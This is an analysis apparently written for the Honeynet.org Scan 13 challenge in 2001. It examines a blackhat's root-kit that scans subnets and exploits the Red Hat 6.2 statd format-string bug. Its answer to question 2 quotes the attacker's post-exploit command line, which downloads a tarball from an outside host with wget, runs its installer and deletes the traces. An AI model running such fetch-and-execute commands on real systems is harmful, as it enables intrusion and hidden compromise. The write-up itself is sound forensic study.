Analysis of Honeynet.org Scan 13 Paul Telford March 21, 2001 1. What is the blackhat attempting to do with his command line syntax? He first attempts to change directories. We have insufficient data to determine if this was successful, as the directories he tries are non-standard. Next, he download and unpacks a root-kit tarball, changes into the directory which it has just created, and begins to run the cracking tool it provides. From key capture, and analysis of the provided source code we can see that he is attempting to scan the following subnets: 216.210.* 200.120.* 64.120.* 216.200.* 200.120.* 63.1.* 216.10.* 210.120.* 64.1.* 216.1.* 194.1.* 216.1.* 210.128.* 24.1.* 12.20.* 2. What does the tool accomplish? The tool attempts to scan the specified subnets for hosts that are listening on port 111 (statd). The tool is hard-coded to try the "Redhat 6.2 (nfs-utils-0.1.6-2)" vulnerability. Any hosts that match this criteria are then attacked using a well-known statd vulnerability. If the host is vulnerable to this attack, a process is opened up which listens on port 39168 for connections. Any subsequent connections to this port will spawn a root shell (/bin/sh). Once the port is available, the root-kit uses it to run the following sequence of commands: cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz ; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n 3. How does the tool work? This tool exploits the statdx exploit originally posted to BugTraq by ron1n in Aug. 2000. It is a string-format exploit. 4. Is this tool a worm, or would you classify it as something else? This tool does automatically download and install a program on the remote system, but it is unclear what the purpose of that program is. It is almost certainly not another copy of the statd exploit, so we cannot classify this as a true self-replicating worm. 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? It is based on the statdx exploit posted to BugTraq by ron1n. It is modified (as noted in the source) to run the wget/tar commands seen above. The original exploit ran only: cd /; ls -alF; id It also includes the luckscan-a port scanner of unknown origins, and the luckgo shell script.